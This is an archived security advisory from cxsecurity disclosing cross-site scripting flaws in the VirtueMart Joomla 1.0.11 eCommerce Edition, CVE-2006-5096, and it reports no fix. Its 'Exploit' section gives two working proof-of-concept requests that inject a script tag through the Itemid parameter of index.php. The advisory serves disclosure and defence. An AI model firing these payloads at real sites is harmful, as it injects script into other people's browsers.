Bug: VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities ( Ascii Version )

Search:
WLB2

VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities

Published
Credit
Risk
2006.10.03
Adrian Castro
Low
CWE
CVE
Local
Remote
CWE-79
CVE-2006-5096
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities

Status: Reported to the Vendor [09/26/2006]
Class: Input Validation Error
Severity: Low

Software Description:
************************************************************************
*****
VirtueMart (formerly known as mambo-phpShop) is an Open Source
E-Commerce solution to be used together with a Content Management
System (CMS) called Joomla!

Vulnerability Description:
************************************************************************
*****
Multiple cross-site scripting vulnerabilities exist in the Joomla
eCommerce edition software provided by VirtueMart.

Vulnerable Software:
************************************************************************
*****
Joomla 1.0.11 eCommerce Edition (prior versions may also be vulnerable)

Exploit:
************************************************************************
*****
GET: index.php
option=com_contact&Itemid="><script>alert('XSS');</script>
POST: index.php
subscriber_name=1&email=1&task=subscribe&Itemid="><script>alert('XSS');<
/script>

Solution:
************************************************************************
*****

None at this time.

Credits:
************************************************************************
*****
Discovered by Adrian Castro

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version